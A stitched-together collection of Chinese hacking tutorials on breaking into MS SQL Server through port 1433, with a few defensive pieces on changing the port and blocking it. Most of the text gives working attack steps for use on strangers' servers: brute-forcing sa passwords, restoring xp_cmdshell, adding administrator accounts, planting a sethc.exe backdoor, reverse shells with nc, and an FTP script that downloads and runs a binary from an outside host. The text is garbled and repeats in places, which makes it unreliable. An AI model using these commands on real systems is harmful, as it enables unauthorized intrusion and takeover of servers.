利用SQL之1433端口巧妙入侵服务器
各个端口的入侵方法(入侵菜鸟必看)
各个端口的入侵方法(入侵菜鸟必看)1. 1433端口入侵scanport.exe 查有1433的机器SQLScanPass.exe 进行字典暴破(字典是关键)最后SQLTools.exe入侵对sql的sp2及以下的系统,可用sql的hello 溢出漏洞入侵。
nc -vv -l -p 本机端口sqlhelloF.exe 入侵ip 1433 本机ip 本机端口(以上反向的,测试成功)sqlhelloz.exe 入侵ip 1433 (这个是正向连接)2. 4899端口入侵用4899过滤器.exe,扫描空口令的机器3. 3899的入侵对很早的机器,可以试试3389的溢出(win3389ex.exe)对2000的机器,可以试试字典暴破。
(tscrack.exe)4. 80入侵对sp3以前的机器,可以用webdav入侵;对bbs论坛,可以试试上传漏洞(upfile.exe或dvup_delphi.exe)可以利用SQL进行注入。
(小榕的注入软件)。
5. serv-u入侵(21端口)对5. 004及以下系统,可用溢出入侵。
(serv5004.exe)对5.1.0.0及以下系统,可用本地提升权限。
(servlocal.exe)======================================对serv-u的MD5加密密码,可以用字典暴破。
(crack.vbs)输入一个被serv-u加密的密码(34位长),通过与字典档(dict.txt)的比较,得到密码。
如:cscript crack.vbs ib0AD10648F17E9E8D1FF316C1BA75105A6. 554端口用real554.exe入侵。
7. 6129端口用DameWare6129.exe入侵。
8. 系统漏洞利用135、445端口,用ms03026、ms03039、ms03049、ms04011漏洞,进行溢出入侵。
9. 3127等端口可以利用doom病毒开的端口,用nodoom.exe入侵。
黑客常用的几种入侵端口的方法
【托管服务qin】黑客常用的几种入侵端口的方法服务器托管, BGP, 光钎专线, 防火墙, 新一代IDC工欲善其事,必先利其器,本文简单介绍目前黑客最常使用的一些入侵工具及防御的方法,希望能对大家有所帮助,以助于大家能更好地防御黑客的攻击。
1. 1433端口入侵scanport.exe 查有1433的机器SQLScanPass.exe 进行字典暴破(字典是关键)最后SQLTools.exe入侵=============================对sql的sp2及以下的系统,可用sql的hello 溢出漏洞入侵。
nc -vv -l -p 本机端口sqlhelloF.exe 入侵ip 1433 本机ip 本机端口(以上反向的,测试成功)sqlhelloz.exe 入侵ip 1433 (这个是正向连接)2. 4899端口入侵用4899过滤器。
exe,扫描空口令的机器3. 3899的入侵对很早的机器,可以试试3389的溢出(win3389ex.exe)对2000的机器,可以试试字典暴破。
(tscrack.exe)4. 80入侵对sp3以前的机器,可以用webdav入侵;对bbs论坛,可以试试上传漏洞(upfile.exe或dvup_delphi.exe)可以利用SQL进行注入。
(小榕的注入软件)。
5. serv-u入侵(21端口)对5. 004及以下系统,可用溢出入侵。
(serv5004.exe)对5.1.0.0及以下系统,可用本地提升权限。
(servlocal.exe)==================================== ==对serv-u的MD5加密密码,可以用字典暴破。
(crack.vbs)输入一个被serv-u加密的密码(34位长),通过与字典档(dict.txt)的比较,得到密码。
如:cscript crack.vbs ib0AD10648F17E9E8D1FF316C1BA75105A6. 554端口用real554.exe入侵。
利用Nmap对MS-SQLSERVER进行渗透
利用Nmap对MS-SQLSERVER进行渗透如今Nmap的脚本引擎从一个普通的端口扫描器转变为具有攻击性的渗透测试工具。
随着nmap各种脚本的存在。
到目前为止,我们甚至可以进行完整的SQL数据库渗透而不需要任何其他的工具。
如今Nmap的脚本引擎从一个普通的端口扫描器转变为具有攻击性的渗透测试工具。
随着nmap各种脚本的存在。
到目前为止,我们甚至可以进行完整的SQL数据库渗透而不需要任何其他的工具。
在本教程中,我们将看到在这些脚本中有些什么样的信息,以及如何通过Nmap从数据库中提取,还可以利用SQLServer 来执行系统命令。
默认MS-SQL数据库上运行的端口为1433,为了及时发现有关数据库,我们需要执行以下脚本:(获取SQL信息)已经获取了数据库的版本和实例的信息。
下一步检查是否有弱口令和数据库身份验证,需要运行以下nmap的脚本,它会执行暴力破解。
(nmap暴力破解MS-SQL账户)可以看到,没有发现任何数据。
在这种情况下可以利用这个脚本来使用我们自己的用户名和密码字典,以便及时发现有效的数据库帐户。
使用这个命令:nmap -p1433 –script ms-sql-brute –script-args userdb=/var/usernames.txt,passdb=/var/passwords.txt还可以尝试另一种脚本,来检查Microsoft SQLServers是否存在空密码。
(检查SA账户是否为空密码)现在我们知道sa帐户没有密码。
我们可以使用这个信息来连接数据库直接执行脚本,需要进一步Nmap有效身份认证。
如果我们想知道在哪个数据库sa帐户访问或任何其他账户,可以运行ms-sql-hasdbaccess脚本与下列参数:(查看某用户访问了哪些DB)通过Nmap查询Microsoft SQL Server来获取数据库表。
SQL Server 2000 的xp_cmdshell 默认情况下是启用的,因此我们甚至可以执行操作系统命令。
各个端口的入侵
5. C:/>net time //127.0.0.1
再查查到时间没有?如果127.0.0.1 的当前时间是 2002/3/19 上午 11:05,那就准备
开始下面的命令。
6. C:/>telnet 127.0.0.1 99
这里会用到Telnet命令吧,注意端口是99。Telnet默认的是23端口,不过我们使
用的
是SRV在对方计算机中为我们建立一个99端口的Shell。
虽然我们能Telnet上去了,不过SRV是一次性的,下次登录还要再激活!所以我们打
算建立一个Telnet服务!这就要用到npy ntlm.exe $">//127.0.0.1/admin$
用Copy命令把ntlm.exe上传到主机上(ntlm.exe也是在《流光》的Tools目录中)。
8. C:/WINNT/system32>ntlm
经典IPC$入侵
1. C:/>net use $">//127.0.0.1/IPC$ "" /user:"admintitrators"
这是用"流光"扫到的用户名是administrators,密码为"空"的IP地址(气好到家如果是打算攻击的话,就能用这样的命令来和127.0.0.1建立一个连
11. C:/>net user guest 1234
1433端口SQL漏洞入侵sql语句大全
1433端口SQL漏洞入侵恢复xp_cmdshell方法总结2009年05月22日星期五18:511433SQL入侵恢复xp_cmdshell方法总结2008-12-03 22:56sql server 2005下开启xp_cmdshell的办法EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;SQL2005开启'OPENROWSET'支持的方法:exec sp_configure 'show advanced options', 1;RECONFIGURE;exec sp_configure 'Ad Hoc Distributed Queries',1;RECONFIGURE;SQL2005开启'sp_oacreate'支持的方法:exec sp_configure 'show advanced options', 1;RECONFIGURE;exec sp_configure 'Ole Automation Procedures',1;RECONFIGURE;突破SA的各种困难常见情况恢复执行xp_cmdshell1 未能找到存储过程'master..xpcmdshell'.恢复方法:查询分离器连接后,第一步执行:EXEC sp_addextendedproc xp_cmdshell,@dllname ='xplog70.dll'declare @o int第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'然后按F5键命令执行完毕2 无法装载 DLL xpsql70.dll 或该DLL所引用的某一 DLL。
如何解决SQLServer2005端口1433总是受到远程连接的问题
如何解决SQLServer2005端口1433总是受到远程连接的问题第一篇:如何解决SQL Server 2005端口1433总是受到远程连接的问题如何解决 SQL Server 2005 端口 1433 总是受到远程连接的问题2008-6-14 18:04 提问者:红色狂想 | 浏览次数:2553 次我是 Windows Server 2003 Enterprise Edition SP2 操作系统,安装的是 SQL Server 2005 Enterprise Edition,每当开机持续一段时间后,就会看到通知区域本地连接的图标不断闪亮,打开防火墙发现有来自不同国家地区的源 IP 地址试图连接本地端口 1433,有连接后断开的,也有正在连接中的,总而言之就是这么反复着,不知有没有什么风险。
我安装 SQL Server 只是为了用于 Web 网站,完全用不着给远程用户提供SQL 访问服务,为了提高安全性,有没有什么办法只让本机能访问 SQL Server,不让远程用户连接 1433 端口呢?问题补充:谢谢大家的建议,以上我的问题基本都解决了。
关于端口1433 受到远程连接的问题我是这样解决的,Windows 防火墙“例外”里面添加端口1433,在将“更改范围”设置为自己的本机地址192.168.1.2,127.0.0.1/255.255.255.0 这样是不是就可以避免再受到远程连接的骚扰了呢?反正这两天我观察 SQL Server 日志没有再发现有来自远程 IP 的登录请求。
当然也有可能是因为我启用了 Windows 防火墙的原因,阻止了一切外部非授权的连接。
因为我的部署主要是Web 与 ASP 应用,所以 TCP/IP 连接是必须的。
我来帮他解答 2008-6-14 21:36满意回答1 隐藏服务器这样可以避免很多扫描工具的扫描2 修改数据库的端口3 利用防火墙的策略禁止某些 ip 段的 ip 或者是端口访问系统4 如果你的系统和你的数据库是在同一台机器上则可以考虑去除掉sqlserver 验证只使用 windows 验证甚至可以考虑使用命名管道连接去除掉 tcp/ip 的连接第二篇:小结SQLServer连接失败错误及解决小结SQL Server连接失败错误及解决在使用 SQL Server 的过程中,用户遇到的最多的问题莫过于连接失败了。
入侵实例
龙域网安入侵系列教程——主讲人:Router这节课给大家讲一下1433端口的入侵及入侵过程中一些常见的情况,我们先来了解下1433端口。
1433端口简介:SQL Server微软出的一款数据库软件,使之客户与主机交流的这么一个程序。
SQL Server使用的1433端口,其中Sa权限为最高权限,我们就是利用肉鸡Sa口令漏洞来入侵的,而一般开1433端口的大多是服务器,所以很受大家的“喜爱”!可惜现在1433的服务器很难扫,至少我还没扫到过服务器,基本上都是xp,偶尔有几个2000(可能是我扫的次数少吧)。
虽然漏洞有点老,但是方法我们还是要掌握的,说不定哪天就用到了。
入侵方法:步骤一:扫描开放1433的端口的主机用纯真IP数据库找一段IP,然后开扫,结果要保存,这里大家自己操作了步骤二:扫sql弱口令,用X-Scan,选择SQL弱口令,然后开扫。
在虚拟机里扫下吧有点慢•节省时间提前扫好了,系统类型不出意外的话还是XP,也在我意料之中。
记得以前扫1433的都是不能执行命令的,为了做教程抽时间扫了一下,没想到都是可以执行命令的,害我扫了好几个IP段才找到台不能执行命令的。
步骤三:执行sql语句拿到cmd shell。
(重点就是这里了)连接sql的工具以前很多人都是用SQL Tools,虽然用起来也算不错但是如果遇到不能执行命令的主机还要另外用分离器,有点麻烦。
所以这里推荐一款工具给大家sqltools,算是新一代的工具吧,可能很多人已经用过了,它的优点就是可以直接执行sql命令,直接恢复xp_cmdshell。
关于的恢复xp_cmdshell网上也有很多方法,这里就介绍个简单的,想要了解更多的话大家可以上网查下。
主要就是两个sql命令:恢复dbccaddextendedproc ("sp_oacreate","odsole70.dll")dbccaddextendedproc ("xp_cmdshell","xplog70.dll")这样可以直接恢复,不用去管sp_addextendedproc是不是存在,原理就不多讲了,还是来看看效果吧连的时候也有点卡,刚才我们第一个工具如果出现刚才那个错误就没办法了,下面换我们的另一个工具,虽然不能执行命令但是这时可以查看文件系统XP,装的瑞星,下面我们恢复xp_cmdshel,看到了没,这样就能执行命令了换另一台试试,提前我没测试的,晕,打开错了,卡应该还是XP,还有QQ和千千静听呢,服务器可不会有这个的,好了,简单回复cmdshell就是这样的了,不过有些时候这个方法也恢复不了呢。
连接SQL?server2005数据库端1433端口的正确方法
连接SQL server2005数据库端1433端口的正确方法现在把在装完程序后,连接端口1433前,要做的几件事情和注意事项总结一下。
步骤:1.关闭数据库引擎,关闭数据库引擎有三种方法:(1)开始->程序->Microsoft SQL Server 2005->配置工具->SQL Server 2005外围应用配置器,在打开的界面单击"服务的连接的外围应用配置器",在打开的界面中找到Database Engine,单击"服务",在右侧查看是否已启动,如果已启动可单击“停止”按钮,即可关闭数据库引擎。
(2)开始->程序->Microsoft SQL Server 2005->配置工具->SQL Server Configuration Manager,选中SQL Server 2005服务中SQL Server(MSSQLSERVER) ,并选中右击,点击停止,即可关闭数据库引擎。
(3) 开始->程序->Microsoft SQL Server 2005-> SQL Server Management Studio,在弹出的连接数据库引擎对话框中点击“连接”按钮,然后选中服务器名称,右击“停止”按钮,即可关闭数据库引擎。
补充注意点:有时候在启动数据库引擎的时候可能会出现错误,不能启动,这时就要查看"SQL Server 2005配置管理器"中的SQL Server 2005网络配置->MSSQLSERVER协议中的VIA是否已启用,如果已启用,则把它禁止.然后再执行上述一种方式操作就可以了.2.配置服务器端和客户端的TCP/IP协议:配置工具->SQL Server Configuration Manager->MSSQLSERVER的协议看看TCP/IP协议是否启动,如果启动,右键菜单点"属性" ,在分页菜单中选"IP地址",把"IP1"和"IP2"中"TCP端口"为1433,"已启用"改为"是"配置工具->SQL Server Configuration Manager->SQL NativeClient 配置->客户端协议->TCP/IP选择TCP/IP右键菜单中"属性",确认"默认端口"是1433,"已启用"为"是"3.开启数据库引擎,方法参考步骤1中的(1)、(2)两点。
1433提权详解
1433提权详解!!!随着网络安全意识的提高,很多服务器的安全防范都非常严了,本人对web入侵是一巧不通就只会扫扫1433弱口令的服务器,于是研究一段时间,虽然进步不大,但是还是想把经验分享一下,正所谓授人以鱼不如授人以渔,而我现在正是告诉你打鱼的方法,下面就以一台服务器为例了,本例使用工具为SQL TOOLS 2.0,论坛有下,请自行搜索。
插播不是广告的广告:该工具集成度高,简单的sql指令无须使用分离器,直接在此工具中执行即可,其文件管理功能非常强大,反正我用着太顺手了,推荐一下,本文原创发布于=华夏黑客同盟论坛=()广告完毕。
把扫到的ip和sa及口令填入连接后,用dos命令功能试试列目录显示错误信息:Error Message:无法装载 DLL xplog70.dll 或该 DLL 所引用的某一 DLL。
原因: 126(找不到指定的模块。
)。
这种情况大家在提权过程中经验遇到啊,它是由于xplog70.dll这个文件被删除或者做了其他限制,导致出现这个错误的这个错误的直接后果就是sql数据库的xp_cmdshell的存储过程无法使用,无法执行命令提权自然就无从说起了,当然我们还可以考虑其他的存储过程如:sp_oacreate和sp_oamethod来直接添加帐号,或者使用沙盘指令来提权,但这台服务器,这些功能都被限制了,还是考虑下恢复xplog70.dll了,测试上传无法成功,这条路走不通了,这时就考虑用到工具的文件管理功能了看到了把,和windows的资源管理器一样好用,目录列出来了,搜索一下可以用来提权的东西吧,这里我们首先要去看看sql的安装路径里的xplog70.dll文件是否存在看到吧,xplog70.dll文件不见了,被删除了,xpweb70.dll也被改了名字了-. - 继续搜寻下其他盘看看还有什么东西d盘下有几个网站和几个论坛,这些都是有用的信息,一旦sql的错误无法恢复的时候,我们就可以考虑通过这些网站来进行提权了,网站的提权,我就是搞不定,痛苦啊==!!继续搜索在e盘下竟然有个sql2000的原始安装文件备份,怦然心动的感觉是美妙的,感谢我们亲爱的服务器管理员大人,看看这是什么====e:\备份软件\MS Sql 2000\DEVELOPER\X86\BINN\那我们就开始恢复试试吧,切换到sql命令项,输入指令exec sp_dropextendedproc 'xp_cmdshell' //这个指令是删除sql数据库的xp_cmdshell的存储过程接着输入指令,重新加载新路径的存储过程。
SQLServer修改默认1433端口
SQLServer修 改 默 认 1433端 口
SQLServer 默认端口是1433 ,容易遭受攻击,所以有时候客户要求用其他端口。下面就是修改默认端口的步骤: 1. 打开 SQLServer 配置管理器 2、配置网络配置 TCP/IP 协议 的默认端口 3、 重新启动SQL Server服务 注意: 1、由于数据库的默认端口配置有1433修改成1488 ,那么应用的配置也要做相应的调整,Ip 地址端口号之间用逗号分隔,而不是分号。例 如: server=192.168.2.188 ;dataBase=myData;uid=sa;pwd=sa; 改成server=192.168.2.188,1488 ;dataBase=myData;uid=sa;pwd=sa; 2、一定要注意防火墙对1488 端口的限制,把1488 端口添加到防火墙的例外中,否则外网没法连接到数据库。
1433沙盒模式入侵服务器技巧
�
任务管理器一调出来 你想做啥都可以了·······
···那要讲的就到这···思路是活的 我讲了在很多种情况下 的对策
但实际你还可能还会遇到其他的情况,不可能全部的情况我都一一讲解对策,不懂
的问我。。
那如果 sethc.exe 也被禁止 怎么办?
那思路也很简单,我们可以调用cacls.exe来设置权限,把sethc.exe net.exe 设置成
select * from openrowset('microsoft.jet.oledb.4.0',';database=c:\windows\system32\ias\ias.mdb','select shell("dllcache\net localgroup administrators user /add")')
很多情况下,到这里应该执行会成功了,dllcache\下的net net1 一般人不会去禁用。
如果,连dllcache\目录下的net net1都被禁用 用户添加不了 又该怎么办?
························
依照是我 ,我会用c:\windows\system32\ias\ias.mdb 来调用system32下的xcopy.exe
来执行命令 ,先说说xcopy是干什么用的 xcopy命令可以用来复制替换文件。
因此我们可以调用xcopy命令 来复制替换掉sethc.exe.
所以 SQL语句就可以这么写:
select * from openrowset('microsoft.jet.oledb.4.0',';database=c:\windows\system32\ias\ias.mdb','selห้องสมุดไป่ตู้ct shell("xcopy taskmgr.exe sethc.exe /y")')
利用MSSQL漏洞攻击
基于MetaSploit平台参透测试—MS SQL漏洞测试1、信息收集使用nmap漏洞扫描器扫描:扫描结果:2、分析漏洞扫描结果报告可以看到,系统开放了一些有意思的端口,包括ms-sql-s这种易受攻击的端口。
但更有意思的是通过nmap扫描,发现系统版本为Windows XP,而在Windows XP2这个版本的系统已经不再维护,许多已公开漏洞在SP3系统中已经修补,但在SP2中依然存在。
扫描结果中还可以看到开放了FTP和SMTP端口,这两个端口可能存在可被利用的漏洞,同时也开放了80端口,意味着我们可以尝试进行Web应用攻击。
在此,我们对MS SQL的1433端口进行攻击,因为这个端口有许多已知的漏洞,可以实现完全入侵并获得管理员权限。
首先,我们需要确认安装了MS SQL,然后尝试对MS SQL服务进行暴力破解以获取密码,MS SQL默认安装在TCP 1433端口和UDP 1434端口,但新版本的MS SQL允许安装到随机动态分配的TCP端口,UDP 1434端口则没有变化,可以通过UDP端口来查询获取SQL服务的TCP动态端口。
这里,通过扫描发现目标系统上的UDP 1434端口是开放的:从上图可以看到,扫描主机发现MS SQL的UDP 1434端口是开放的。
以MS SQL未目标,我们可以使用mssql_ping模块来找出MS SQL服务端口,并进行用户名与口令的猜解。
MS SQL在初次安装的时候需要用户创建sa或系统管理员用户。
由于有些管理员在安装程序时没有足够的安全意识,常常会设置空密码或弱密码,因此我们可以尝试猜测或暴力破解sa用户的密码。
下面,我们将使用mssql_login模块来尝试对sa用户进行暴力破解。
通过use scanner/mssql/mssql_ping 命令调用mssql_ping模块和设置参数,然后运行,可以看到SQL服务器安装在192.168.128.129上,服务器名为USER-A67C37F0BC,版本号为9.00.1399.06(SQL Server2005),监听的端口号是1433,如下图所示:下一步,我们利用Metasploit框架的mssql_login模块来进行暴力破解:选择mssq_login模块,使用密码字典中的密码列表,成功猜解除了sa口令:bluedon。
1433端口的溢出攻击
在win2000机器上装了mssql的话,机器就会开1433端口。
什么是端口,就像食堂买菜的窗口一样,你买白菜上1号窗,买西红柿上2号窗。
在机器上买mssql就上1433窗。
溢出1433需要两个工具:nc.exe和sql2.exe,在都有下载。
进攻方法就两步:第一步,在自己机器上开一个cmd窗口。
对了,你要用win2000的话,就开始-运行-写入cmd 回车。
这里我们只用2000,不说98。
如果你把你下的nc.exe和sql2.exe和我习惯一样放在c:盘的话,就在你开的这个窗口下打入命令c:>nc -l -p 40回车。
这步的意思是用nc这个工具开一个40的端口监听。
第二步:再在开始-运行-写入cmd回车,再开一个窗口。
在这个窗口写命令行c:>sql2.exe 你要入侵网站的ip 自己的ip 40 0回车。
这里要作点说明:如何得到入侵网站ip?在cmd下c:>ping 就可以看到了。
自己的ip呢?在cmd下c:>ipconfig就可以看到了。
其中命令行中的40你可以随意改成别的,但好像40和53成功率高一点。
再是命令中的0不行的话,你就试试1或2。
如果入侵网站有这个漏洞话,那么你开的第一个窗口就会变成肉鸡的c:\winnt\system32>.就是说,你已经进入它的机器里了。
进去以后,你可以填加个用户了。
net user guest /active:yes用这个命令,就将默认禁止的guest用户激活。
net user guest 123456这样guest的密码变成123456了。
net localgroup administrators guest /add这就是guest成为最高权限的管理员了。
本贴包含图片附件:第二:1433空密码入侵。
1433还有一个漏洞,就是如果默认安装的话,用户名是sa,密码是空的。
那么我们就可以用supersqlexec.exe连接上去,这东东在也有下。
SQL2000的1433端口修改方法
步骤一:在如下路径找到1步文件双击打开
C:\Program Files\Microsoft SQL Server\80\Tools\Binn
例:3步1433改成34286确定。
把1433改成非常用端口号,例:18090
步骤二:打开服务端文件夹内:TEL.exe如下图:
例:登陆。
1.SQL2000的TCP: sqlserver端口默认为1433,建议修改端口后按新端口号使用,以避免病毒入侵。
(常有木马扫描此1433知名端口,所以建议修改成不知名端口使用)
注意事项
如果是拨号上网用户,没有使用路由器只护的客户断网后安装SQL2000,请修改端口号再连接上网。
关闭端口1433,阻止sql2000服务器远程入侵
设置安全策略:
“控制面板”——〉“管理工具”——〉“本地安全策略”
选择IP安全策略—创建IP安全策略—建立名称—默认下一步
OK 建立新的策略完成选择你新建的策略–属性然后添加
下一步
选择Kerberos V5协议继续下一步选择是选择所有IP通讯
继续下一步完成选中“所有IP 通讯”——〉点“编辑”按钮,打开“IP筛选器列表”——〉继续点“编辑”按钮,打开“筛选器属性”
完成上面配置后在你刚配置的策略右键指派
指派出错的请启动下图服务。
配置完成后重新启动机器。
如何验证数据库的1433已经不能连接?
方法一:
局域网内找一个机器(非本机)安装企业管理,添加注册刚刚配制过安全策略的服务器,应
该是那个等待注册的画面,状态中显示:“正在验证注册信息”或拒绝连接或服务未开启的提示。
方法二:
局域网内找一个机器(非本机),在dos控制台下,输入telnet EP服务器IP 1433
如果安全策略应用成功的话,应该不能够连接,会出现如下的话:正在连接到xxxxxxx...无法打开到主机的连接在端口1433 : 连接失败。
如果应用安全策略失败,则能够连接成功。
【1433端口入侵】
【1433端口入侵】[删除]图片:图片:[删除]图片:[删除]没什么技术含量,只为新手做个引导.1433端口简介!SQL Server微软出的一款数据库软件,使之客户与主机交流的这么一个程序。
SQL Server使用的1433端口,其中Sa权限为最高权限,我们就是利用肉鸡Sa口令漏洞来入侵的,而一般开1433端口的大多是服务器,所以很受大家的“喜爱”!工具:scannerX-Scan-v3.3SQL综合利用工具在百度搜索,一般都有下载,注意去大型正规网站,并且杀毒!!!需要记住的命令:建立用户net user 帐户密码/add (注意空格,帐户密码自己设置)例如:net user TT86 123 /add (帐户TT86 密码123)把帐户提生为管理员组net localgroup administrators 帐户/add一样:net localgroup administrators TT86 /add (把TT86帐户提升为管理员)正式开始首先,我们用scanner扫描IP,端口设置为1433(看图)将开放1433端口的IP保存,再重新导入scanner扫描3389端口,我们的目的始终利用到3389端口了。
将同时开放1433 3389端口的IP保存起来打开X-Scan-v3.3导入IP参数设置选择几个有用的(看图)扫描结束后点漏洞问题一般会有SQL-Server弱口令:"sa/[空口令]"复制有漏洞的IP打开SQL综合利用工具连接打开利用目录选择执行DOS命令(看图)先执行这个建立用户net user a a /add然后把A用户提生为管理员组net localgroup administrators a /add 自己建立自己的帐号,建立好后会显示执行成功好了,现在我们在肉鸡的电脑里就建立了一个帐户了再就是使用3389端口连接,使用我们刚才建立的帐户登陆吧!其他的放木马什么就不用教了吧!呵呵!就这么简单,祝大家运气好点,顺利的找到肉鸡!。
第1个实验 1433端口漏洞(网络攻防教程)
实验一目标系统的扫描探测方法【实验目的】通过练习使用网络探测扫描工具,可以了解目标主机的信息:IP 地址、开放的端口和服务程序等,从而获得系统有用信息,发现网络系统的漏洞。
通过实验,给某些粗心大意的网络管理人员一个警告,可以增强网络网络安全的防护意识。
【实验环境】软件工具:scanport SuperSQLEXE【实验内容】◆任务内容1 使用scanport工具1.设置扫描的端口1433。
2.使用软件scanport查询有问题的计算机的Ip地址。
◆任务内容2 使用SuperSQLEXE工具连接目标主机1.从我们学校的FTP中下载SuperSQLEXE;2.选择一个IP,输入到SuperSQLEXE中,输入用户名sa,密码进行猜测,弱密码一般是:空,123456,123,sa,admin等;3.进行连接,如果不成功,请改换密码,如果总是不成功,请换IP.4.如果连接成功,可以查询目标计算机的C盘,D盘,E盘的东西。
5.练习黑客常用命令:(1)查询被黑计算机上的用户名:net user(2)修改被黑计算机的密码:net user administrator 123456(3)在被黑计算机上新建用户:net user abc 123456 /add(4)把普通用户升为超级管理员:net localgroup administrators abc /add(5)关掉被黑的计算机:shutdown -s -f -t 0(6)重启被黑的计算机民:shutdown -r -f -t 0(7)开启远程桌面:第一步:reg query"HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Contr ol\Terminal Server"第二步:reg delete"HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Contr ol\Terminal Server" /v fDenyTSConnections /f第三步:reg add"HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Contr ol\Terminal Server" /v fDenyTSConnections /tREG_DWORD /d 0 /f。
SQL关闭外网对1433端口的访问
近期在运营管理中,发现采用单台服务器部署监控平台软件方案的地方常常出现服务器遭到数据攻击,故共享以下文档仅供管理员参考。
《SQL关闭外网对1433端口的访问避免黑客是通过数据库提权建利管理员帐号和密码》一.创建IP筛选器和筛选器操作1.”开始”->”程序”->”管理工具”->”本地安全策略”。
微软建议使用本地安全策略进行IPsec的设置,因为本地安全策略只应用到本地计算机上,而通常ipsec都是针对某台计算机量身定作的。
2.右击”Ip安全策略,在本地机器”,选择”管理 IP 筛选器表和筛选器操作”,启动管理 IP 筛选器表和筛选器操作对话框。
我们要先创建一个IP筛选器和相关操作才能够建立一个相应的IPsec安全策略。
3.在”管理 IP 筛选器表”中,按”添加”按钮建立新的IP筛选器:1)在跳出的IP筛选器列表对话框内,填上合适的名称,我们这儿使用”tcp1433″,描述随便填写.单击右侧的”添加”按钮,启动IP筛选器向导。
2)跳过欢迎对话框,下一步。
3)在IP通信源页面,源地方选”任何IP地址”,因为我们要阻止传入的访问。
下一步。
4)在IP通信目标页面,目标地址选”我的IP地址”。
下一步。
5)在IP协议类型页面,选择”TCP”。
下一步。
6)在IP协议端口页面,选择”到此端口”并设置为”1433″,其它不变。
下一步。
7)完成。
关闭IP筛选器列表对话框。
会发现tcp1433IP筛选器出现在IP筛选器列表中。
4.选择”管理筛选器操作”标签,创建一个拒绝操作:1)单击”添加”按钮,启动”筛选器操作向导”,跳过欢迎页面,下一步。
2)在筛选器操作名称页面,填写名称,这儿填写”拒绝”。
下一步。
3)在筛选器操作常规选项页面,将行为设置为”阻止”。
下一步。
4)完成。
5.关闭”管理 IP 筛选器表和筛选器操作”对话框。
二.创建IP安全策略1.右击”Ip安全策略,在本地机器”,选择”创建IP安全策略”,启动IP安全策略向导。
1433sql弱口令入侵启动cmd问题集合
1433sql弱口令入侵启动cmd问题集合1.需要的工具:s扫描器x-scan sql连接器sql查询分析器入侵思路:s扫描器→→→→扫描大量的开放1433端口的服务器↓↓↓↓↓→→→→x-sacn →→→→扫描sql弱口令↓↓↓↓→→→→sql连接器→→→链接到服务器上→→→→cmd命令提权(net user nohack$ nohack123 /add net localgroup administrator nohack /add)→→→→开放3389,远程桌面mstsc链接→→→获得服务器控制权使用cmd命令时易发生错误,主要错误和解决办法如下:一、Error Message:未能找到存储过程'master..xp_cmdshell'解决办法:通过SQL查询分析器链接目标SQL,然后再新文本框中执行命令:1、drop procedure sp_addextendedprocdrop procedure sp_oacreateexec sp_dropextendedproc 'xp_cmdshell'2、dbcc addextendedproc ("sp_oacreate","odsole70.dll")dbcc addextendedproc ("xp_cmdshell","xplog70.dll")二、拒绝访问解决办法:在sql连接器中选择sql命令执行Dir net.exe /s /p 找到net.exe的备份使用或者将cmd命令中的net 换做net1 进行使用三、Error Message:SQL Server 阻止了对组件'xp_cmdshell' 的过程'sys.xp_cmdshell' 的访问,因为此组件已作为此服务器安全配置的一部分而被关闭。
- 1、下载文档前请自行甄别文档内容的完整性,平台不提供额外的编辑、内容补充、找答案等附加服务。
- 2、"仅部分预览"的文档,不可在线预览部分如存在完整性等问题,可反馈申请退款(可完整预览的文档不适用该条件!)。
- 3、如文档侵犯您的权益,请联系客服反馈,我们会尽快为您处理(人工客服工作时间:9:00-18:30)。
利用SQL之1433端口巧妙入侵服务器
利用1433端口提权
相信大家扫到很多1433 都提示用net net1 提权都说拒绝访问!且又无法上传!今天给大家针对Net没权限情况的提权方法;
1、未找到储存过程!那就来修复下吧!
用到SQL语句:
xp_cmdshell新的恢复办法
第一步先删除:
drop procedure sp_addextendedproc
drop procedure sp_oacreate
exec sp_dropextendedproc 'xp_cmdshell'
第二步恢复:
dbcc addextendedproc ("sp_oacreate","odsole70.dll")
dbcc addextendedproc ("xp_cmdshell","xplog70.dll")
直接恢复,不管sp_addextendedproc是不是存在
图1
2、修复好了!又出现问题了!xplog70.dll被删除了!看来只有用授鱼的那修复法!图2
3、d:\应用软件\SQLServer2000MicrosoftSQLServer2000SP4简体中文企业光盘版\SP4\x86\binn\xplog70.dLL
找到了哈哈!
图3
4、恢复!
用到SQL语句:
第一
exec sp_dropextendedproc 'xp_cmdshell'
第二
dbcc addextendedproc ("xp_cmdshell","d:\应用软件\SQLServer2000MicrosoftSQLServer2000SP4简体中文企业光盘版\SP4\x86\binn\xplog70.dLL")
恢复好了
图4
5、提下权 net net1 都拒绝访问!管理降低了权限!图5
6、于是我想到了后门提权! 居然管理也注意到了后门!写了权限!
用到CMD命令:
五shift键(前提是能执行DOS命令,并且sethc.exe没加保护)一般只要执行第一步!copy C:\WINDOWS\explorer.exe c:\windows\system32\sethc.exe
copy C:\WINDOWS\explorer.exe c:\windows\system32\dllcache\sethc.exe
图6
7、插入一点:如果DOS不能执行命令的话!那就用SQL执行替换命令!(成功率比较低!)
用到SQL语句:
利用SQL分析器开shift后门(一般只要执行第一步!然后进入后,替换自己的后门)
第一:
declare @o int
exec sp_oacreate 'scripting.filesystemobject', @o out
exec sp_oamethod @o,
'copyfile',null,'C:\WINDOWS\explorer.exe' ,'c:\windows\system32\sethc.exe';
第二:
declare @oo int
exec sp_oacreate 'scripting.filesystemobject', @oo out
exec sp_oamethod @oo,
'copyfile',null,'c:\windows\system32\sethc.exe' ,'c:\windows\system32\dllcache\sethc.exe'; 图7
8、这里是本节的重点了!利用传马的方式提权!
首先自己架设一个FTP 或是自己已经有FTP的!
把本机的net放到FTP空间里去!随便改个名字!切记不要和net相同即可!
把FTP传马方式的语句一句一句复制执行DOS命令!
用到CMD命令:
echo open FTP> xiuxiu.txt 注意 xiuxiu.txt你可以随意改!但是要和下的相同! echo 帐号>> xxxx.txt
echo 密码>> xxxx.txt
echo binary >> xxxx.txt
echo get net的名字.exe>> xxxx.txt
echo bye >> xxxx.txt
ftp -s:xxxx.txt
del xxxx.txt. /q /f
图8
9、好了!执行下最后一条命令! 嘿嘿!发现和FTP抓鸡方式一样!有鸡来下载!图9
10、好了!最后一条命令执行成功了!返回以下数据!注意:服务器必须能上网!
图10
11、我XXxX 我自己的 net好象没加权限吧! 居然不能执行
